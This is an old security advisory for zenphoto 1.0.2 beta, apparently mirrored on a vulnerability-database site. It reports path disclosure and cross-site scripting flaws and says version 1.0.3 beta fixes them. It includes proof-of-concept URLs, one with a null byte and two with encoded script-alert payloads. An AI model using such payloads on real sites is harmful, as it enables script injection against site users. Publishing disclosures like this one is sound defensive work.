Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14660
HistoryOct 13, 2006 - 12:00 a.m.

zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities

2006-10-1300:00:00
vulners.com
108
JSON

Vendor: zenphoto
Vulnerable: zenphoto 1.0.2 beta and below

The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta.

Path Disclosure

http://www.example.com/photos/zen/i.php?a=EXISTING_ALBUM_NAME&i=EXISTING_IMAGE_NAME&s=thumb%00

which returns:

Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /path/photos/zen/i.php on line 85…

Cross Site Scripting

http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAMEℑ=EXISTING_IMAGE_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3Eaaaa

Solution

Update to 1.0.3 beta

Original advisory

http://zone14.free.fr/advisories/4/

–Raphael HUCK

JSON